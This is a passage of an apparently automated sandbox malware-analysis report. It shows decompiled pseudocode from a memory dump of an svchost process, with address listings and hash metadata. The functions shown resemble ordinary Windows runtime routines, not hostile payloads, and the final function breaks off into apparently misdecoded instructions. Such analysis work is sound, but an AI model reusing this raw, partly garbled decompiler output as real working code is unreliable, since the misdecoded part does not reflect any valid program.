							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L03A7DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E03A6B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E03A6B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E03A6E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E03A6A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                          0x03a2b171
                                          0x03a2b171
                                          0x03a2b171
                                          0x03a2b171
                                          0x03a2b171
                                          0x03a2b176
                                          0x03a2b17b
                                          0x03a2b180
                                          0x03a2b186
                                          0x03a2b18f
                                          0x03a2b198
                                          0x03a2b1a4
                                          0x03a2b1aa
                                          0x03a84802
                                          0x03a84802
                                          0x03a84805
                                          0x03a8480c
                                          0x03a8480e
                                          0x03a2b1d1
                                          0x03a2b1d3
                                          0x03a2b1de
                                          0x03a2b1de
                                          0x03a84817
                                          0x03a8481e
                                          0x03a84820
                                          0x03a84822
                                          0x03a84822
                                          0x03a84824
                                          0x03a84824
                                          0x03a8482a
                                          0x00000000
                                          0x00000000
                                          0x03a84835
                                          0x03a8483a
                                          0x03a8483d
                                          0x03a8483f
                                          0x03a84842
                                          0x03a84842
                                          0x03a84842
                                          0x03a84846
                                          0x03a8484c
                                          0x03a8484e
                                          0x03a84851
                                          0x03a84851
                                          0x03a84853
                                          0x03a84854
                                          0x03a84854
                                          0x03a84858
                                          0x03a8485a
                                          0x03a8485a
                                          0x03a8485d
                                          0x03a8485f
                                          0x03a84861
                                          0x03a84861
                                          0x03a84866
                                          0x03a8486b
                                          0x03a8486e
                                          0x03a84871
                                          0x03a84876
                                          0x03a84876
                                          0x03a84878
                                          0x03a8487b
                                          0x03a84884
                                          0x03a84884
                                          0x00000000
                                          0x03a8487d
                                          0x03a8487d
                                          0x03a84882
                                          0x03a84889
                                          0x03a84889
                                          0x03a8488f
                                          0x03a84891
                                          0x03a848e0
                                          0x03a848e2
                                          0x03a848e4
                                          0x03a848e4
                                          0x03a848e7
                                          0x03a848e7
                                          0x03a848ed
                                          0x03a848f4
                                          0x03a848f6
                                          0x03a84951
                                          0x03a84951
                                          0x03a84953
                                          0x03a84953
                                          0x03a84956
                                          0x03a84956
                                          0x03a84958
                                          0x03a84959
                                          0x03a84959
                                          0x03a8495d
                                          0x03a8495d
                                          0x03a8495f
                                          0x03a8495f
                                          0x03a84965
                                          0x03a84969
                                          0x03a849ba
                                          0x03a849ba
                                          0x03a849c1
                                          0x03a849c5
                                          0x03a849cc
                                          0x03a849d4
                                          0x03a849d7
                                          0x03a849da
                                          0x03a849e4
                                          0x03a849e5
                                          0x03a849f3
                                          0x03a84a02
                                          0x00000000
                                          0x03a84a02
                                          0x03a84972
                                          0x03a84974
                                          0x00000000
                                          0x00000000
                                          0x03a84976
                                          0x03a84979
                                          0x03a84982
                                          0x03a84983
                                          0x03a84984
                                          0x03a8498b
                                          0x03a8498d
                                          0x03a84991
                                          0x03a84993
                                          0x03a84999
                                          0x03a8499d
                                          0x03a849a2
                                          0x03a849a2
                                          0x03a849a2
                                          0x03a84999
                                          0x03a849ac
                                          0x00000000
                                          0x03a849b3
                                          0x03a848f8
                                          0x03a848fe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a848fe
                                          0x03a84895
                                          0x03a8489c
                                          0x03a848ad
                                          0x03a848b2
                                          0x03a848b5
                                          0x03a848b7
                                          0x03a848ba
                                          0x03a848bc
                                          0x03a848c6
                                          0x03a848c6
                                          0x03a848cb
                                          0x03a848d1
                                          0x03a848d4
                                          0x03a848d8
                                          0x03a848d8
                                          0x00000000
                                          0x03a848d8
                                          0x03a848be
                                          0x03a848c0
                                          0x00000000
                                          0x00000000
                                          0x03a848c2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a848c4
                                          0x00000000
                                          0x03a84882
                                          0x03a8487b
                                          0x03a84904
                                          0x03a84906
                                          0x00000000
                                          0x00000000
                                          0x03a84908
                                          0x03a8490e
                                          0x00000000
                                          0x00000000
                                          0x03a84910
                                          0x03a84917
                                          0x03a84917
                                          0x00000000
                                          0x03a84917
                                          0x03a2b1ba
                                          0x03a847f9
                                          0x03a847fc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a847fc
                                          0x03a2b1c0
                                          0x03a2b1c0
                                          0x03a2b1c3
                                          0x03a2b1cb
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: _vswprintf_s
                                          • String ID:
                                          • API String ID: 677850445-0
                                          • Opcode ID: 6ddfeb00815f7c6eb29714a06d97e0f258f1f9ec81aaa0412a0c3e59d962741b
                                          • Instruction ID: f03908faf01b9b91676a66ccde5b6dc5b6d057bef2285f9a637814e7490e0189
                                          • Opcode Fuzzy Hash: 6ddfeb00815f7c6eb29714a06d97e0f258f1f9ec81aaa0412a0c3e59d962741b
                                          • Instruction Fuzzy Hash: 9051F175D0436A8FDF30EF69C944BAEBBB4BF08710F1545AFD859AB281D77049428B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A4B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E03A4B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x3b1d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03A47D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03AF8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03A69E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E03A6B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E03A6CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03A47D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03AF8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E03A6AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3b18628; // 0x0
								_v68 = _t77;
								_t78 =  *0x3b1862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3b18628; // 0x0
							_t116 =  *0x3b1862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                          0x03a4b94c
                                          0x03a4b956
                                          0x03a4b95c
                                          0x03a4b95e
                                          0x03a4b964
                                          0x03a4b969
                                          0x03a4b96d
                                          0x03a4b96d
                                          0x03a4b970
                                          0x03a4b974
                                          0x03a4b97a
                                          0x03a4badf
                                          0x03a4badf
                                          0x03a4bae2
                                          0x03a4bae4
                                          0x03a4bae6
                                          0x03a4baf0
                                          0x03a92cb8
                                          0x03a4baf6
                                          0x03a4baf6
                                          0x03a4baf6
                                          0x03a4bafd
                                          0x03a4bb1f
                                          0x03a4bb1f
                                          0x03a4baff
                                          0x03a4bb00
                                          0x03a4bb00
                                          0x03a4bb03
                                          0x03a4bb03
                                          0x03a4bacb
                                          0x03a4bacf
                                          0x03a4bad0
                                          0x03a4bad1
                                          0x03a4badc
                                          0x03a4badc
                                          0x03a4b980
                                          0x03a4b980
                                          0x03a4b988
                                          0x03a4b98b
                                          0x03a4b98d
                                          0x03a4b990
                                          0x03a4b993
                                          0x03a4b999
                                          0x03a4b99b
                                          0x03a4b9a1
                                          0x03a4b9a5
                                          0x03a4b9aa
                                          0x03a4b9b0
                                          0x03a4b9bb
                                          0x03a4b9c0
                                          0x03a4b9c3
                                          0x03a4b9ca
                                          0x03a4b9cc
                                          0x03a4b9cf
                                          0x03a4b9d3
                                          0x03a4b9d7
                                          0x03a4ba94
                                          0x03a4ba94
                                          0x03a4ba98
                                          0x03a4baa3
                                          0x03a92ccb
                                          0x03a4baa9
                                          0x03a4baa9
                                          0x03a4baa9
                                          0x03a4bab1
                                          0x03a92cd5
                                          0x03a92cdd
                                          0x03a92cdd
                                          0x03a4babb
                                          0x03a4babc
                                          0x03a4bac2
                                          0x03a4bac3
                                          0x03a4bac3
                                          0x03a4bac6
                                          0x00000000
                                          0x03a4b9dd
                                          0x03a4b9dd
                                          0x03a4b9e7
                                          0x03a4b9e7
                                          0x03a4b9ec
                                          0x03a4b9ec
                                          0x03a4b9f1
                                          0x03a4b9f5
                                          0x03a4b9fa
                                          0x03a4ba00
                                          0x03a4ba0c
                                          0x03a4ba10
                                          0x03a4ba10
                                          0x03a4ba12
                                          0x03a4ba18
                                          0x00000000
                                          0x00000000
                                          0x03a4bb26
                                          0x03a4bb26
                                          0x03a4ba1e
                                          0x03a4ba1e
                                          0x03a4ba23
                                          0x03a4ba25
                                          0x03a4ba2c
                                          0x03a4ba30
                                          0x03a4ba35
                                          0x03a4ba35
                                          0x03a4ba41
                                          0x03a4ba46
                                          0x03a4ba4c
                                          0x03a4ba50
                                          0x03a4ba54
                                          0x03a4ba6a
                                          0x03a4ba6e
                                          0x03a4ba70
                                          0x03a4ba74
                                          0x03a4ba78
                                          0x03a4ba7a
                                          0x03a4ba7c
                                          0x03a4ba8e
                                          0x03a4ba90
                                          0x03a4ba92
                                          0x03a4bb14
                                          0x03a4bb14
                                          0x03a4bb16
                                          0x03a4bb16
                                          0x00000000
                                          0x03a4ba7c
                                          0x03a4bb0a
                                          0x03a4bb0d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a4bb0f

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A4B9A5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 885266447-0
                                          • Opcode ID: d62957c3495962487cf41ae6b5900e62bd80b1e42f7cbf422bb7a090f69240ca
                                          • Instruction ID: e25ce04fd16497866e8a630655ed832cf80c6918435a0d77fffdb2b4289df8cb
                                          • Opcode Fuzzy Hash: d62957c3495962487cf41ae6b5900e62bd80b1e42f7cbf422bb7a090f69240ca
                                          • Instruction Fuzzy Hash: 7F513571A08344CFC720DF29C18092ABBF9BBC8654F58896FE9D59B354D771E844CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A52581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E03A52581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, void* _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v1524072449;
				intOrPtr _v1524085249;
				signed int _t240;
				signed int _t244;
				signed int _t246;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				signed int _t256;
				signed int _t263;
				signed int _t266;
				signed int _t274;
				intOrPtr _t280;
				signed int _t282;
				signed int _t284;
				signed int _t289;
				signed int _t290;
				unsigned int _t293;
				signed int _t297;
				signed int _t299;
				signed int _t303;
				intOrPtr _t315;
				signed int _t324;
				signed int _t326;
				signed int _t327;
				signed int _t331;
				signed int _t332;
				void* _t336;
				signed int _t337;
				signed int _t339;
				signed int _t342;
				void* _t343;
				void* _t346;
				void* _t347;

				_t339 = _t342;
				_t343 = _t342 - 0x4c;
				_v8 =  *0x3b1d360 ^ _t339;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t331 = 0x3b1b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t293 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t347 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t280 = 0x48;
				_t313 = 0 | _t347 == 0x00000000;
				_t324 = 0;
				_v37 = _t347 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t280 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t332 = 0xc0000106;
						goto L32;
					} else {
						_t331 = L03A44620(_t293,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t280);
						_v52 = _t331;
						__eflags = _t331;
						if(_t331 == 0) {
							_t332 = 0xc0000017;
							goto L32;
						} else {
							 *(_t331 + 0x44) =  *(_t331 + 0x44) & 0x00000000;
							_t50 = _t331 + 0x48; // 0x48
							_t326 = _t50;
							_t313 = _v32;
							 *((intOrPtr*)(_t331 + 0x3c)) = _t280;
							_t282 = 0;
							 *((short*)(_t331 + 0x30)) = _v48;
							__eflags = _t313;
							if(_t313 != 0) {
								 *(_t331 + 0x18) = _t326;
								__eflags = _t313 - 0x3b18478;
								 *_t331 = ((0 | _t313 == 0x03b18478) - 0x00000001 & 0xfffffffb) + 7;
								E03A6F3E0(_t326,  *((intOrPtr*)(_t313 + 4)),  *_t313 & 0x0000ffff);
								_t313 = _v32;
								_t343 = _t343 + 0xc;
								_t282 = 1;
								__eflags = _a8;
								_t326 = _t326 + (( *_t313 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t274 = E03AB39F2(_t326);
									_t313 = _v32;
									_t326 = _t274;
								}
							}
							_t297 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t332 = _v68;
								__eflags = 0;
								 *((short*)(_t326 - 2)) = 0;
								goto L32;
							} else {
								_t284 = _t331 + _t282 * 4;
								_v56 = _t284;
								do {
									__eflags = _t313;
									if(_t313 != 0) {
										_t240 =  *(_v60 + _t297 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t284 =  *(_v60 + _t297 * 4);
										 *(_t284 + 0x18) = _t326;
										_t244 =  *(_v60 + _t297 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M03A52959))) {
												case 0:
													__ax =  *0x3b18488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E03A6F3E0(__edi,  *0x3b1848c, __ax & 0x0000ffff);
														__eax =  *0x3b18488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E03A6F3E0(_t326, _v80, _v64);
													_t269 = _v64;
													goto L26;
												case 2:
													 *0x3b18480 & 0x0000ffff = E03A6F3E0(__edi,  *0x3b18484,  *0x3b18480 & 0x0000ffff);
													__eax =  *0x3b18480 & 0x0000ffff;
													__eax = ( *0x3b18480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E03A6F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E03A6F3E0(_t326, _v76, _v36);
														_t269 = _v36;
													}
													L26:
													_t343 = _t343 + 0xc;
													_t326 = _t326 + (_t269 >> 1) * 2 + 2;
													__eflags = _t326;
													L27:
													_push(0x3b);
													_pop(_t271);
													 *((short*)(_t326 - 2)) = _t271;
													goto L28;
												case 6:
													__ebx =  *0x3b1575c;
													__eflags = __ebx - 0x3b1575c;
													if(__ebx != 0x3b1575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E03A6F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x3b1575c;
														} while (__ebx != 0x3b1575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x3b18478 & 0x0000ffff = E03A6F3E0(__edi,  *0x3b1847c,  *0x3b18478 & 0x0000ffff);
													__eax =  *0x3b18478 & 0x0000ffff;
													__eax = ( *0x3b18478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E03AB39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x3b16e58 & 0x0000ffff = E03A6F3E0(__edi,  *0x3b16e5c,  *0x3b16e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x3b16e58 & 0x0000ffff;
													__eax = ( *0x3b16e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t297 = _v16;
													_t313 = _v32;
													L29:
													_t284 = _t284 + 4;
													__eflags = _t284;
													_v56 = _t284;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t297 = _t297 + 1;
									_v16 = _t297;
									__eflags = _t297 - _v48;
								} while (_t297 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t324 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M03A52935))) {
							case 0:
								__ax =  *0x3b18488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t313 =  &_v64;
								_v80 = E03A52E3E(0,  &_v64);
								_t280 = _t280 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x3b18480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3b18480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E03A3EEF0(0x3b179a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E03A3EB70(__ecx, 0x3b179a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t332;
												if(_t332 < 0) {
													L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t293 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x3b17b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E03A3EB70(__ecx, 0x3b179a0);
										__eax = _v52;
										L36:
										_pop(_t325);
										_pop(_t333);
										__eflags = _v8 ^ _t339;
										_pop(_t281);
										return E03A6B640(_t219, _t281, _v8 ^ _t339, _t313, _t325, _t333);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t276 = _v56;
								if(_v56 != 0) {
									_t313 =  &_v36;
									_t278 = E03A52E3E(_t276,  &_v36);
									_t293 = _v36;
									_v76 = _t278;
								}
								if(_t293 == 0) {
									goto L44;
								} else {
									_t280 = _t280 + 2 + _t293;
								}
								goto L14;
							case 6:
								__eax =  *0x3b15764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x3b18478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3b18478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x3b16e58 & 0x0000ffff;
								__eax = ( *0x3b16e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t324 = _t324 + 1;
								if(_t324 >= _v48) {
									goto L16;
								} else {
									_t313 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("movsd");
					asm("movsd");
					_t346 = _t343 +  *((intOrPtr*)(_t331 + 0x28)) + _t244;
					asm("daa");
					asm("movsd");
					asm("es movsd");
					asm("movsd");
					_t246 = _t244 +  *((intOrPtr*)(_t331 + 0x28)) +  *0x1f03a526;
					__eflags = _t246 & 0xa5289403;
					_v1524072449 = _v1524072449 - _t346;
